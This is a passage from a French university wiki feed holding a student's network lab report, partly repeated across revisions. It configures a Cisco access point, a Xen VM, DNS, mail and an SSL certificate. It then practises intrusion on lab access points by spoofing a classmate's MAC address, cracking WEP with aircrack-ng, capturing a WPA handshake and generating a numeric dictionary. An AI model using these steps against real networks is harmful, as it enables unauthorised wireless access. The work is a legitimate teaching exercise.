auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23128</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23128"/>
				<updated>2015-11-22T17:47:28Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
